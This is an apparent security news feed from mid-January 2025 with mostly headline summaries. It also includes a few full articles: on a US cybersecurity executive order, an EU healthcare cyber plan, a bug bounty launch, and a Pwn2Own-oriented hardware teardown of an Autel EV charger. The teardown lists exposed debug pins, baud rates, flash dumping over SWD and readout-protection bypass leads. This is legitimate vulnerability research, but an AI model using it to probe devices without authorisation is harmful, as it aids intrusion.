GitHub’s Deepfake Porn Crackdown Still Isn’t WorkingOver a dozen programs used by creators of nonconsensual explicit images have evaded detection on the developer platform, WIRED has found.
by WIRED Security News
2025-01-16 11:00:00
Trusted Apps Sneak a Bug Into the UEFI Boot ProcessSeven system recovery programs contained what amounted to a backdoor for injecting any untrusted file into the system startup process.
by Dark Reading
2025-01-16 10:30:00
A New Jam-Packed Biden Executive Order Tackles Cybersecurity, AI, and MoreUS president Joe Biden just issued a 40-page executive order that aims to bolster federal cybersecurity protections, directs government use of AI—and takes a swipe at Microsoft’s dominance.
by WIRED Security News
2025-01-16 10:13:58
US issues final rule barring Chinese and Russian connected car techThe U.S. Commerce Department has issued a rule banning connected vehicle technologies linked to China and Russia, citing national security risks. The post US issues final rule barring Chinese and Russian connected car tech appeared first on ZENDATA Cybersecurity.
by Zendata
2025-01-16 10:05:00
Site Reliability Engineering Teams Face Rising ChallengesCatchpoint's 2025 SRE Report shows reliability teams are spending more time on operational tasks while grappling with evolving performance expectations.
by ITPro Today
2025-01-16 10:00:17
7 ways to get more out of your Bitwarden password managerBitwarden is one of the best password managers on the market, but are you using it effectively? Here are a few tips to ensure you are.
by ZDNET Security
2025-01-16 10:00:00
AI Trends and Predictions 2025 From Industry InsidersIT leaders and industry insiders share their AI trends and predictions for 2025.
by ITPro Today
2025-01-16 09:54:00
5 critical cybersecurity skills gap trends for 2025Want to stay ahead in 2025? Here's HTB's take on the top trends shaping skills gaps in the cybersecurity industry (and how your team can adapt to the changes ahead).
by Hack The Box Blog
2025-01-16 09:52:00
New Cybersecurity Executive Order: What It Means for Federal Agencies
The Executive Order on Strengthening and Promoting Innovation in the Nation's Cybersecurity includes guidance on third-party risk management and the need to adopt proven security practices to gain visibility of security threats across network and cloud infrastructure. Here we highlight six key provisions and offer guidance on how federal agencies can prepare.

On Jan. 16, the Biden Administration released the Executive Order on Strengthening and Promoting Innovation in the Nation's Cybersecurity. In an era of escalating threats, it is important for the U.S. government to take steps toward a more secure digital infrastructure. The EO is being released in the wake of cyberattacks, such as Salt Typhoon, by threat groups supported by the People's Republic of China, which, as recently as last week, breached the U.S. Department of the Treasury.

The EO is intended to build on President Joseph R. Biden's previous EO 14028 and focuses on the nation's ability to address key threats and defend against continued cyber campaigns targeting the United States and Americans, as well as ensuring the security of the services and capabilities most vital to the digital domain.

As the Biden Administration comes to a close and President Donald J. Trump is sworn in on Jan. 20, it's important to remember that cybersecurity is not a partisan issue but a national security concern. As in our collaboration during the first Trump Administration, Tenable stands ready to engage with the incoming team to assess and defend critical networks in government and throughout enterprise to protect Americans and ensure the resilience of our critical infrastructure.

While the EO is aimed at government agencies, many of the principles behind it are equally relevant to private sector organizations looking to improve their security posture. It includes guidance on third-party management practices, adopting proven security practices to gain visibility of security threats across networks and cloud infrastructure, and securing communications networks. It also provides recommendations on combating cybercrime and fraud, promoting security with artificial intelligence (AI) and aligning policy to practice.

Below we highlight six key provisions of the EO and offer recommendations on how to prepare to meet the requirements.

6 key provisions of the Executive Order on Strengthening and Promoting Innovation in the Nation's Cybersecurity

1. Operationalizing transparency and security in third-party software supply chains
The EO mandates that federal agencies adopt more rigorous third-party risk management practices to ensure the safety and security of the software providers operating within the federal government. It calls for:
- Software providers to submit secure software development attestations, and high-level artifacts to validate those attestations, to the Cybersecurity and Infrastructure Security Agency (CISA).
- The establishment of National Institute of Standards and Technology (NIST) guidelines and security practices for safe and secure software procurement, which will be incorporated into the Secure Software Development Framework (SSDF) and ultimately into White House Office of Management and Budget Memorandum M-22-18. They will include practices, procedures, controls and implementation examples.
- Federal agencies to comply with the guidance in NIST Special Publication 800-161 Revision 1 to integrate cybersecurity supply chain risk management programs into broader risk management activities.
- CISA and the General Services Administration to issue recommendations to agencies on the management of open source software.
How to prepare: Start with an inventory of all third-party providers working with your agency. How much visibility do you have into the level of risk these providers present? Is their software integral to your agency's ability to function? Can it access sensitive data, such as personally identifiable information (PII)? Does it offer an opportunity for an attacker to gain entry or move laterally within your infrastructure?

2. Improving the cybersecurity of federal systems
This section of the EO focuses on adopting proven security practices in order to gain visibility of security threats across networks and strengthen cloud security. Key call-outs in this section include:
- Identity and access management (IAM): IAM practices are critical and should be implemented as part of an agency's broader security strategy.
- Cloud security: To secure federal data in the cloud, the EO requires cloud service providers in the FedRAMP marketplace to produce baselines with specifications and recommendations for agency configurations of cloud-based systems.
- Space security: The security of space systems must be enhanced to adapt to evolving threats. The EO mandates that agencies take steps to continually verify that federal space systems have the requisite cybersecurity capabilities through actions like continuous assessments, testing, exercises, and modeling and simulation.
How to prepare: Audit your identity and access management systems. Are you considering user privileges in your overall risk profile? Consider how much access and visibility your security team has into your cloud infrastructure. Does your agency have continuous processes to manage identity and privileges across cloud environments? At what stage is security brought into your cloud deployments? It should be incorporated into the entire process, from ideation to system development and deployment. Are you performing continuous monitoring of IAM, cloud and space systems (if applicable)? Many third-party contracts pre-date supply chain risk-management reviews. Do your contracts account for security requirements and support?

3. Securing federal communications
The EO emphasizes the importance of securing communication networks from cyberattacks and sets forth guidelines and procedures to ensure the security of federal communications. Key points include:
- Strong identity authentication and encryption must be implemented.
- Encrypting DNS traffic is critical.
- Email messages, as well as modern communications such as voice and video conferencing and instant messaging, must be encrypted in transit and, where practical, use end-to-end encryption.
- Quantum computers pose a significant risk to national security. Agencies should require post-quantum cryptography in applicable product categories as defined by CISA.
- The federal government should protect and audit access to cryptographic keys with extended lifecycles. Guidelines will be developed by NIST, and FedRAMP requirements will be updated to incorporate those guidelines.
How to prepare: Evaluate your identity authentication and encryption capabilities for all forms of communication, from DNS to email systems. Are you following the NIST SP 800-63 Digital Identity Guidelines? Are there gaps in your systems that need to be addressed? Are there product categories within your systems that would require post-quantum cryptography? Ciphers that are not quantum-resistant will pose increasing risk as quantum computing matures.

4. Solutions to combat cybercrime and fraud
With the growing demand for digital services, it is essential for agencies to adopt digital identity verification solutions that ensure secure access, enhance accessibility and prevent fraud. This section of the EO encourages the safe and secure use of digital identity documents to access public benefits programs that require identity verification. It states that NIST will issue implementation guidance and the Treasury will develop a pilot program to notify individuals when their identity information is used to request a payment from a public benefits program.
How to prepare: Evaluate your digital identity verification strategy. How are you preventing digital identity fraud? What key performance indicators (KPIs) do you use to track the effectiveness of your program? Have you considered a more rigorous verification strategy that verifies identities at the front end? Are you using a holistic identity verification approach that validates multiple aspects of someone's identity?

5. Promoting security with and in artificial intelligence (AI)
AI is emerging as a game changer in the ongoing battle for federal cybersecurity. As such, the EO calls on the federal government to accelerate the development and deployment of AI, specifically as it relates to improving the cybersecurity of critical infrastructure. The EO further establishes a pilot program on the use of AI to enhance cyber defenses of critical infrastructure and accelerates research at the intersection of AI and cybersecurity.
How to prepare: Evaluate how AI can be implemented in your security strategy in order to reduce risk. Do you have guidelines for using AI in your agency? Have you experimented with AI security tools? Are there ways you can leverage AI to reduce the pressure on your security teams?

6. Aligning policy to practice
This section of the EO focuses on modernizing federal IT infrastructure and networks to better defend against cyberattacks and reduce cyber risk. It focuses on developing guidance to help agencies share and exchange cybersecurity information, obtain enterprise-wide visibility, and prepare to be held accountable for enterprise-wide cybersecurity programs. It further promotes the adoption of evolving cybersecurity practices, such as the migration to zero trust, and ensuring agencies can identify, assess and respond to the risk presented by IT vendor concentration.
How to prepare: Assess how much visibility you currently have into your IT infrastructure. Are you able to continuously assess vulnerabilities and misconfigurations in your on-premises and cloud environments with the added context of identity and access privileges, so you always have an up-to-date view of your risk? Do you have a way to quickly generate reports that you can share with other agencies?

Conclusion
The Executive Order on Strengthening and Promoting Innovation in the Nation's Cybersecurity addresses some of the most pressing concerns in cybersecurity, including the safety of the software supply chain, the need for improved visibility across systems such as identity and access management and cloud infrastructure, the need to protect communications with end-to-end encryption, and the promise of AI to aid in cybersecurity efforts. Its provisions offer a blueprint for improving cybersecurity for government agencies while providing sound guidance for private-sector organizations to consider in their efforts to reduce cyber risk.
by Tenable
2025-01-16 09:49:54
PlugX malware deleted from thousands of systems by FBIThe FBI has announced it's deleted PlugX malware from approximately 4,258 US-based computers and networks.
by Malwarebytes Labs
2025-01-16 09:18:02
Scammers Exploit California Wildfires, Posing as Fire Relief ServicesCybercriminals are exploiting the California wildfires by launching phishing scams. Learn how hackers are targeting victims with fake domains and deceptive tactics, and how to protect yourself from these cyber threats.
by Hackread
2025-01-16 08:04:47
EU Steps Up Cyber Defense with Action Plan to Protect Critical Healthcare Infrastructure
The European Commission has rolled out a comprehensive plan to fortify the cybersecurity of hospitals and healthcare providers across the EU. Recognizing the increasing frequency of cyberattacks on healthcare systems, this EU Action Plan aims to safeguard patient care, improve response capabilities, and establish trust in digital healthcare solutions.

The healthcare sector has witnessed a rise in cyberattacks in recent years. In 2023 alone, EU Member States reported 309 significant cybersecurity incidents targeting healthcare providers, more than in any other critical sector. These disruptions, which can delay medical procedures and endanger lives, highlight the pressing need for resilient cybersecurity strategies.

Key Highlights of the EU Action Plan
The EU Action Plan is designed to tackle cybersecurity challenges in the healthcare sector through a four-pronged approach: prevention, detection, response, and deterrence.

Enhanced prevention
The plan emphasizes strengthening the healthcare sector's preparedness to prevent cybersecurity incidents. This includes:
- Guidance on critical cybersecurity practices: Hospitals and healthcare providers will receive tailored guidelines to implement best practices for cybersecurity.
- Cybersecurity vouchers: Financial assistance in the form of vouchers will be made available to micro, small, and medium-sized healthcare providers to enhance their cybersecurity capabilities.
- Learning resources: New educational tools and training programs will be developed to equip healthcare professionals with the knowledge needed to navigate cybersecurity challenges.

Improved threat detection
The EU Action Plan proposes the establishment of a Cybersecurity Support Centre for Hospitals and Healthcare Providers under the guidance of ENISA, the EU Agency for Cybersecurity. By 2026, the Centre will provide an EU-wide early warning system, offering near-real-time alerts about potential cyber threats.

Effective response to cyberattacks
To minimize the impact of cyber incidents, the Action Plan includes the following measures:
- A rapid response service under the EU Cybersecurity Reserve, leveraging private incident response providers to support healthcare organisations.
- Development of response playbooks to guide healthcare organisations in handling specific threats, such as ransomware.
- National cybersecurity exercises to strengthen incident response capabilities across Member States.
- Encouragement for Member States to mandate the reporting of ransom payments, enabling authorities to provide support and conduct follow-ups with law enforcement.

Deterrence
To discourage cyberattacks on European healthcare systems, the plan includes the use of the Cyber Diplomacy Toolbox, a coordinated EU diplomatic response to malicious cyber activities. This framework aims to hold cyber threat actors accountable and protect critical healthcare infrastructure.

Collaborative Implementation and Next Steps
The success of the EU Action Plan will depend on collaboration among healthcare providers, Member States, and the cybersecurity community. To ensure the plan is effective and addresses the needs of all stakeholders, the Commission will soon launch a public consultation open to citizens and industry experts. The feedback gathered will help refine the proposed measures, with specific actions scheduled for rollout in 2025 and 2026.

Building on a Strong Legislative Framework
The EU Action Plan builds on existing EU legislation to strengthen cyber resilience. Healthcare providers are identified as a sector of high criticality under the NIS2 Directive, which works in tandem with the Cyber Resilience Act, a landmark EU regulation that mandates cybersecurity requirements for digital products. Additionally, the recently established Cyber Emergency Mechanism under the Cyber Solidarity Act will play a crucial role in detecting, preparing for, and responding to cybersecurity threats. The initiative also supports the broader goal of creating a European Health Data Space, a framework designed to empower citizens with control over their health data while ensuring the security of sensitive information.

Henna Virkkunen, Executive Vice-President for Tech Sovereignty, Security, and Democracy, emphasized the importance of resilience in healthcare systems: "Modern healthcare has made incredible advances through digital transformation, which has meant citizens have benefited from better healthcare. Unfortunately, health systems are also subject to cybersecurity incidents and threats. That is why we are launching an Action Plan to ensure that healthcare systems, institutions, and connected medical devices are resilient. Prevention is better than cure, so we need to prevent cyber-attacks from happening. But if they happen, we need to have everything in place to detect them and to quickly respond and recover."

Olivér Várhelyi, Commissioner for Health and Animal Welfare, highlighted the role of trust in digital healthcare: "Digital technologies and health data-driven solutions have opened unparalleled opportunities in healthcare. They enable precision medicine, real-time patient monitoring, and seamless communication between healthcare providers across borders. But digitalisation is only as strong as the trust it inspires and its resilience to cyberattacks. Patients must feel confident that their most sensitive information is secure. Healthcare professionals must have faith in the systems they use daily to save lives. Today's Action Plan is an important step towards securing that trust and safeguarding a more resilient health ecosystem for the future."

A Step Towards a Secure Digital Healthcare Future
The EU Action Plan reflects the Commission's commitment to fostering a secure and resilient healthcare sector. By addressing cybersecurity challenges through prevention, detection, response, and deterrence, the plan lays the groundwork for a safer healthcare environment where technology empowers patients, enhances care, and supports professionals. As the healthcare sector continues to embrace digitalisation, the EU remains steadfast in its mission to protect its citizens and critical infrastructure from emerging cyber threats.
by The Cyber Express
2025-01-16 07:39:00
CISA clocked Salt Typhoon in federal networks before telecom intrusionsOutgoing CISA Director Jen Easterly didn’t say what agencies were impacted by Salt Typhoon or when, but noted it provided greater visibility into the active campaign.
by Cybersecurity Dive
2025-01-16 05:35:00
Biden administration rolls out wide-reaching cybersecurity executive orderReleased in the administration''s final days, the highly-anticipated order follows a series of sophisticated attacks against federal agencies and critical infrastructure providers.
by Cybersecurity Dive
2025-01-16 00:00:00
CrowdStrike Falcon Identity Protection Delivered $1.26M in Total Benefits Over Three Years
by CrowdStrike
2025-01-16 00:00:00
Zero Trust Strengthens Data Protection to Achieve National Cyber Strategy Goals
by CrowdStrike
2025-01-15 23:11:51
CISA's AI Playbook Pushes For More Information SharingThe Joint Cyber Defense Collaborative playbook seeks to establish "a unified approach" on how to handle AI-related cybersecurity threats.
by Dark Reading
2025-01-15 22:24:23
Governments call for spyware regulations in UN Security Council meetingSeveral governments participated in a meeting on the proliferation of commercial spyware at the United Nations Security Council.
by TechCrunch
2025-01-15 21:33:00
Attackers Hijack Google Advertiser Accounts to Spread MalwareIt's an especially brazen form of malvertising, researchers say, striking at the heart of Google's business; the tech giant says it's aware of the issue and is working quickly to address the problem.
by Dark Reading
2025-01-15 21:18:00
Google Ads Users Targeted in Malvertising Scam Stealing Credentials and 2FA CodesCybersecurity researchers have alerted to a new malvertising campaign that's targeting individuals and businesses advertising via Google Ads by attempting to phish for their credentials via fraudulent ads on Google. "The scheme consists of stealing as many advertiser accounts as possible by impersonating Google Ads and redirecting victims to fake login pages," Jérôme Segura, senior director of
by The Hacker News
2025-01-15 21:07:00
Lazarus Group Targets Web3 Developers with Fake LinkedIn Profiles in Operation 99The North Korea-linked Lazarus Group has been attributed to a new cyber attack campaign dubbed Operation 99 that targeted software developers looking for freelance Web3 and cryptocurrency work to deliver malware. "The campaign begins with fake recruiters, posing on platforms like LinkedIn, luring developers with project tests and code reviews," Ryan Sherstobitoff, senior vice president of Threat
by The Hacker News
2025-01-15 19:21:26
10 Strategies to Communicate Cloud Security Gaps to LeadershipRead actionable strategies to communicate cloud security gaps and recommendations to leadership.
by Mitiga
2025-01-15 19:08:16
Black Basta-Style Cyberattack Hits Inboxes with 1,165 Emails in 90 MinutesA recent cyberattack, mimicking the tactics of the notorious Black Basta ransomware group, targeted one of SlashNext’s clients.…
by Hackread
2025-01-15 19:02:00
North Korean IT Worker Fraud Linked to 2016 Crowdfunding Scam and Fake DomainsCybersecurity researchers have identified infrastructure links between the North Korean threat actors behind the fraudulent IT worker schemes and a 2016 crowdfunding scam. The new evidence suggests that Pyongyang-based threat groups may have pulled off illicit money-making scams that predate the use of IT workers, SecureWorks Counter Threat Unit (CTU) said in a report shared with The Hacker
by The Hacker News
2025-01-15 18:24:00
The best free VPNs of 2025: Expert testedWe tested the best free VPNs from reputable companies that offer solid services. Here's what to know, how to avoid security risks, and what ZDNET's recommendations are.
by ZDNET Security
2025-01-15 18:21:14
Campaign Targeting Publicly Exposed Management Interfaces on Fortinet FortiGate Firewalls Utilizing Zero-DayExecutive Summary In early December 2024, Arctic Wolf Labs identified a sophisticated cyberattack campaign targeting Fortinet FortiGate firewall devices. Unidentified threat actors exploited a suspected zero-day vulnerability to gain unauthorized access to the devices’ management interfaces, allowing them to alter firewall configurations and extract credentials using DCSync. Community Impact A successful compromise of FortiGate firewalls in this...
by RH-ISAC
2025-01-15 17:56:00
Google Cloud Researchers Uncover Flaws in Rsync File Synchronization ToolAs many as six security vulnerabilities have been disclosed in the popular Rsync file-synchronizing tool for Unix systems, some of which could be exploited to execute arbitrary code on a client. "Attackers can take control of a malicious server and read/write arbitrary files of any connected client," the CERT Coordination Center (CERT/CC) said in an advisory. "Sensitive data, such as SSH keys,
by The Hacker News
2025-01-15 17:28:37
Survey surfaces 2025 cybersecurity challengesAI security automation requires access to the relevant data at the right time and place. This will be the most important capability that cybersecurity teams will need to have in 2025.
by Barracuda
2025-01-15 17:00:00
The High-Stakes Disconnect For ICS/OT SecurityWhy does ICS/OT need specific controls and its own cybersecurity budget today? Because treating ICS/OT security with an IT security playbook isn’t just ineffective—it’s high risk. In the rapidly evolving domain of cybersecurity, the specific challenges and needs for Industrial Control Systems (ICS) and Operational Technology (OT) security distinctly stand out from traditional IT security. ICS/OT
by The Hacker News
2025-01-15 16:51:35
CISA: Second BeyondTrust Vulnerability Added to KEV CatalogBeyondTrust has patched all cloud instances of the vulnerability and has released patches for self-hosted versions.
by Dark Reading
2025-01-15 16:18:50
Extension Poisoning Campaign Highlights Gaps in Browser SecurityEvidence suggests that some of the payloads and extensions may date as far back as April 2023.
by Dark Reading
2025-01-15 16:06:13
Microsoft Office support in Windows 10 ends in October too - what that really meansThe end of support is near for more than just Windows 10. But there's no need to panic.
by ZDNET Security
2025-01-15 16:02:08
North Korea's Lazarus APT Evolves Developer-Recruitment Attacks"Operation 99" uses job postings to lure freelance software developers into downloading malicious Git repositories. From there, malware infiltrates developer projects to steal source code, secrets, and cryptocurrency.
by Dark Reading
2025-01-15 15:34:45
Japan Attributes More Than 200 Cyberattacks to China Threat Actor "MirrorFace" Japan’s National Police Agency (NPA) has attributed more than 200 cyber incidents over the past five years to the China-aligned threat actor “MirrorFace,” Infosecurity Magazine reports.
by KnowBe4
2025-01-15 15:00:00
OWASP's New LLM Top 10 Shows Emerging AI ThreatsUltimately, there is no replacement for an intuitive, security-focused developer working with the critical thinking required to drive down the risk of both AI and human error.
by Dark Reading
2025-01-15 14:52:11
Introducing Lightspark's Public Bug Bounty Program
Expanding Our Bug Bounty Program
At Lightspark, we’ve always been focused on security that meets and exceeds industry standards. We’ve been partnering with HackerOne, the global leader in ethical hacking and human-powered security, on our bug bounty program. Today we’re announcing that we’re ramping up the scale of this reporting and sharing our bug bounty program publicly. We’ve already invited a few security researchers and white hat hackers to pressure test our offerings and collect bug reports, which has been so useful, but now we are formalizing our approach.
Details on the Program
Our rewards are based on severity. Hackers reporting vulnerabilities will receive the following payout levels (at Lightspark’s discretion), based on the tier of the vulnerability:
- Low: $150
- Medium: $750
- High: $2000
- Critical: $5000
Hackers can report bugs on any facet of Lightspark, whether it’s our APIs, open source software, or website. We’re committed to meeting our response targets for hackers participating in our program, and we’ll keep everyone informed about our progress. We help our customers deliver Internet payments at scale and improve the financial system for everyone. Our customers rely on us to provide secure, enterprise-grade Lightning payment services. This update to our expanded bug bounty program demonstrates the importance of and our commitment to security in our services. We’re excited to work with the community and are looking forward to feedback. For more details on the Lightspark Bug Bounty Program, please visit hackerone.com/lightspark_bbp.
by HackerOne
2025-01-15 14:45:15
PowerSchool data breach victims say hackers stole ‘all’ historical student and teacher dataA trove of information on current and former students and teachers was accessed during the December cyberattack, sources say.
by TechCrunch
2025-01-15 14:45:00
Reviewing the Attack Surface of the Autel MaxiCharger: Part One
For the upcoming Pwn2Own Automotive contest a total of 7 electric vehicle chargers have been selected. One of these is the Autel MaxiCharger AC Wallbox Commercial (MAXI US AC W12-L-4G), which also made an appearance at the inaugural Pwn2Own Automotive last January. We previously posted internal photos of the MaxiCharger in 2023, so the goal of this blog post is to present up-to-date internal photos of the main boards and provide additional information.

Internals
Opening the MaxiCharger is easy and involves removing a few Torx T10 screws and then prying open the edges of the housing. The metrology board is mounted on the back part of the housing and is responsible for power monitoring, handling the input mains power and providing power to the charging cable. Most of the components mounted on the lower-voltage part of the board (towards the top) are covered in conformal coating.

Figure 1: Power board

Towards the top right of the power board is the STM32F407ZGT6, a general-purpose ARM Cortex-M4 microcontroller. Many of the pins surrounding the STM32 are broken out and are not covered in conformal coating, allowing for easy probing. UART output can be viewed using the broken-out pins above the STM32 at a baud rate of 921600 bps. SWD pins are also broken out, which allows full access to the STM32, including dumping the internal flash. A cursory glance at the flash dump shows references to FreeRTOS.

The power board connects to the main board, which is mounted on the top part of the housing. The main board is responsible for most of the heavy lifting, including handling Bluetooth, Wi-Fi, Ethernet and more. This board isn't covered in conformal coating, but quite a few of the components are under metal shielding that was removed for the following photos.

Figure 2: Main board (top)

The main board contains many labelled test points that make for easy probing. In the top left is the Barrot BR8041A01 Bluetooth module. There isn't much publicly available information about this module. The test points nearby suggest that this module is operated over UART (BT_RX, BT_TX); however, sniffing these points doesn't show much other than very basic initialization, even when attempting to pair a new device. Towards the center of the board is an IS65WV10248EBLL (PDF) SRAM chip.

Flipping the main board over reveals the main processor and an ESP32. Again, there are many labelled test points.

Figure 3: Main board (underside)

The MCU is the GD32F407ZGT6 (PDF) ARM Cortex-M4. Interestingly, it has been noted that Autel occasionally swaps the GD32F407ZGT6 for the STM32F407ZGT6 for unknown reasons, presumably due to supply. To the left of the battery are the broken-out SWD pins for the MCU. Connecting to these pins shows that the MCU has been configured with readout protection level 1 (or "Security Protection Code low", to use GigaDevice's terminology).

Figure 4: Secured GD32 device detected

This prevents tools such as ST-Link and J-Link from dumping the internal flash; however, Jonathan Andersson and Thanos Kaliyanakis' Black Hat EU talk details a few very interesting bypasses that circumvent this readout protection. One such method doesn't require glitching.

To the right of the MCU is a Winbond W25Q128JV (PDF) serial flash chip. Below it is an RJ45 jack for Ethernet communications. This is one of the ways the charger can connect to the internet; the other methods are Wi-Fi and a mobile network. There is a mysterious USB-C port to the left of the MCU which doesn't have a documented use. This isn't the only USB port on the Autel with an unknown use, but it is the only one that can be accessed without dismantling the charger.

The ESP32 module in the top left is the ESP32-WROOM-32D (PDF), which has Bluetooth and Wi-Fi capabilities. Internally the module uses the ESP32-D0WD dual-core Xtensa MCU and a 4MB SPI flash chip. Directly above the USB-C port one of the GD32 UARTs is broken out. Connecting at a baud rate of 921600 bps shows a lot of debugging information. Interestingly, during initialization the string "UART_WIFI_BT" is printed alongside AT commands that are sent from the GD32 to the ESP32. When pairing a new device, many of these messages are logged. Combining this information with the very little traffic sniffed to/from the Barrot Bluetooth module over the test points hints that the Barrot Bluetooth module is redundant; it seems the ESP32 is used for the Bluetooth operations. To the right of the ESP32 are more broken-out pins, this time for one of the ESP32 UARTs and the IO0 pin, which is used for ESP32 boot mode selection. Connecting to the UART header at 115200 baud shows the usual ESP32 boot log.

Stacked underneath the main board is the 4G board, which has a SIM card tray and a mobile communications module.

Figure 5: 4G mobile communications board

The 4G module is the Quectel EC25AFXDGA (PDF), which internally uses the Qualcomm MDM9207 LTE modem, itself containing an ARM Cortex-A7 core. The SIM card tray sits to the left of the 4G module. Connecting the Autel to a mobile network is optional. The top right of the 4G board has a micro-USB port with no known use; the charger must be disassembled to access this port. Presumably this is for some kind of debugging of the 4G module. A few pins are broken out from the 4G module along the left side of the board. Connecting to RXD and TXD at 115200 baud prints a Linux boot log which ultimately drops to a login prompt for the Quectel module. Above the UART connection is a header labelled "BOOT". Shorting these unpopulated headers together and then booting the charger changes the behavior of the 4G module: notably, the UART connection no longer prints the Linux boot log. This behavior may be linked to the aforementioned USB port, but this wasn't investigated further.

Interestingly, under the 4G board is yet another unused micro-USB port. This is attached to the back of the LCD board and is likely used for debugging LCD-related functionality. The silkscreen also shows SWD-related text.

Figure 6: Unused USB port

The final board of interest is the NFC and LED board, which is connected to the main board. There is an unused 4-pin connector on the back of the board which is likely for debugging purposes.

Figure 7: NFC and LED board (top)

Flipping the board over reveals the NFC chip.

Figure 8: Multi-protocol contactless transceiver

The NFC chip is a Fudan Microelectronics FM17660 multi-protocol contactless transceiver IC.

Summary
Overall, all the main components are the same as the previous MaxiCharger we tore down last year, which is good news for any contestants who previously bought the MaxiCharger. Hopefully this blog post provides enough information to kickstart vulnerability research against the Autel MaxiCharger. Keep an eye out for future posts that will cover the threat landscape of the MaxiCharger. We are looking forward to Pwn2Own Automotive again in Tokyo in January 2025 at Automotive World, and we will see if IVI vendors have improved their product security. Don’t wait until the last minute to ask questions and register! We hope to see you there. You can find me on Twitter at @ByteInsight, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.
by Zero Day Initiative Blog
2025-01-15 14:42:54
Russia and Azerbaijan’s narrative warfare against Armenia’s European pathRussia and Azerbaijan deploy aligned narratives to undermine Armenia's partnership with the West The post Russia and Azerbaijan’s narrative warfare against Armenia’s European path appeared first on DFRLab.
by DFRLab
2025-01-15 14:00:00
ISC2 Cybersecurity Workforce Study: Shortage of AI skilled workersAI has made an impact everywhere else across the tech world, so it should surprise no one that the 2024 ISC2 Cybersecurity Workforce Study saw artificial intelligence (AI) jump into the top five list of security skills. It’s not just the need for workers with security-related AI skills. The Workforce Study also takes a deep […] The post ISC2 Cybersecurity Workforce Study: Shortage of AI skilled workers appeared first on Security Intelligence.
by Security Intelligence
2025-01-15 13:47:31
Phishing and Persistence: Darktrace’s Role in Defending Against a Sophisticated Account TakeoverIn a recent incident, Darktrace uncovered a M365 account takeover attempt targeting a company in the manufacturing industry. The attacker executed a sophisticated phishing attack, gaining access through the organization’s SaaS platform. This allowed the threat actor to create a new inbox rule, potentially setting the stage for future compromises.
by Darktrace
2025-01-15 13:45:00
Practical Methods for Decapping ChipsDiscover the intricate process of chip decapping, exposing secrets stored within snuggly layers of industrial epoxy, sleeping in beds of silicon. The post Practical Methods for Decapping Chips appeared first on NetSPI.
by NetSPI
2025-01-15 13:39:42
The great Google Ads heist: criminals ransack advertiser accounts via fake Google adsAn ongoing malvertising campaign steals Google advertiser accounts via fraudulent ads for Google Ads itself.
by Malwarebytes Labs
2025-01-15 13:30:44
UnitedHealth hid its Change Healthcare data breach notice for monthsThe ransomware attack on Change Healthcare affected over 100 million Americans, the health giant told regulators.
by TechCrunch
2025-01-15 13:00:27
Slew of WavLink vulnerabilitiesLilith >_> of Cisco Talos discovered these vulnerabilities. Forty-four vulnerabilities and sixty-three CVEs were discovered across ten .cgi and three .sh files, as well as the static login page, of the Wavlink AC3000 wireless router web application. The Wavlink AC3000 wireless router is one of the
by Cisco Talos Blog
2025-01-15 12:24:48
8 zero-days in one Patch Tuesday? Welcome to 2025The January 2025 Patch Tuesday consists of 159 Microsoft CVEs, including three that are actively exploited.
by ThreatDown
2025-01-15 12:10:00
Software Development Trends and Predictions 2025 From Industry InsidersIT leaders and industry insiders share their software development trends and predictions for 2025.
by ITPro Today
2025-01-15 12:04:19
Web shop spreads SocGolish malware and steals credit cardsA web shop selling jewelry was found with code belonging to two web skimmers and the SocGolish Trojan downloader.
by ThreatDown
2025-01-15 12:00:00
I’m Helping with Layoffs, But It’s Breaking MeNavigating layoffs is never easy, especially when tasked with offboarding longtime colleagues.
by ITPro Today
2025-01-15 11:46:13
Cyber disruptions remain top business risk concern in US, globallyA report from Allianz shows the global disruption caused by CrowdStrike’s IT mishap added to longtime concerns about data breaches and ransomware.
by Cybersecurity Dive
2025-01-15 11:44:00
FBI Deletes PlugX Malware from 4,250 Hacked Computers in Multi-Month OperationThe U.S. Department of Justice (DoJ) on Tuesday disclosed that a court-authorized operation allowed the Federal Bureau of Investigation (FBI) to delete PlugX malware from over 4,250 infected computers as part of a "multi-month law enforcement operation." PlugX, also known as Korplug, is a remote access trojan (RAT) widely used by threat actors associated with the People's Republic of China (PRC
by The Hacker News
2025-01-15 10:59:48
Unlocking the Benefits of Security Validation ServicesIn the modern IT landscape GSI’s, MSP’s, and VAR’s are tasked with delivering robust, scalable, and secure solutions to their enterprise clients. With the ever-growing cybersecurity threats and increasing regulatory requirements, the addition of security validation and exposure validation services to a provider’s service offering is no longer optional—it’s a strategic necessity.
by Picus Security
2025-01-15 10:45:00
3 Actively Exploited Zero-Day Flaws Patched in Microsoft's Latest Security UpdateMicrosoft kicked off 2025 with a new set of patches for a total of 161 security vulnerabilities across its software portfolio, including three zero-days that have been actively exploited in attacks. Of the 161 flaws, 11 are rated Critical and 149 are rated Important in severity. One other flaw, a non-Microsoft CVE related to a Windows Secure Boot bypass (CVE-2024-7344, CVSS score: 6.7), has not
by The Hacker News
2025-01-15 10:40:00
Critical SimpleHelp Flaws Allow File Theft, Privilege Escalation, and RCE AttacksCybersecurity researchers have disclosed multiple security flaws in SimpleHelp remote access software that could lead to information disclosure, privilege escalation, and remote code execution. Horizon3.ai researcher Naveen Sunkavally, in a technical report detailing the findings, said the "vulnerabilities are trivial to reverse and exploit." The list of identified flaws is as follows -
by The Hacker News
2025-01-15 10:26:57
RansomHub Ransomware: Darktrace’s Investigation of the Newest Tool in ShadowSyndicate's ArsenalBetween September and October 2024, Darktrace investigated several customer networks compromised by RansomHub attacks. Further analysis revealed a connection to the ShadowSyndicate threat group. Read on to discover how these entities are linked and the tactics, techniques, and procedures employed in these attacks.
by Darktrace
2025-01-15 10:26:57
Why AI-powered Email Protection Became Essential for this Global Financial Services LeaderAbout the customer: Serving more than two million active customers, this leading money transmitter, facilitates more than $9 billion in remittances via thousands of agent locations across the US. Customers can transfer funds to hundreds of thousands of locations–including 2,000 banks, across 80 countries for cash payout or direct deposits to bank accounts.
by Darktrace
2025-01-15 10:26:00
Cyber security dovetails with AI to lead 2025 corporate IT investment
by ComputerWeekly
2025-01-15 09:53:27
Open Banking Shortcomings Threaten UK Global Leadership Position Research FindsAPIContext has released its UK Open Banking API Performance 2023-2024 Report, the annual analysis of the performance of the open banking APIs exposed by the large CMA9 UK banks (the nine largest banks required by UK law to provide open banking services), traditional High Street banks, credit card providers, building societies, and new digital banks (neobanks). […] The post Open Banking Shortcomings Threaten UK Global Leadership Position Research Finds appeared first on IT Security Guru.
by IT Security Guru
2025-01-15 09:53:21
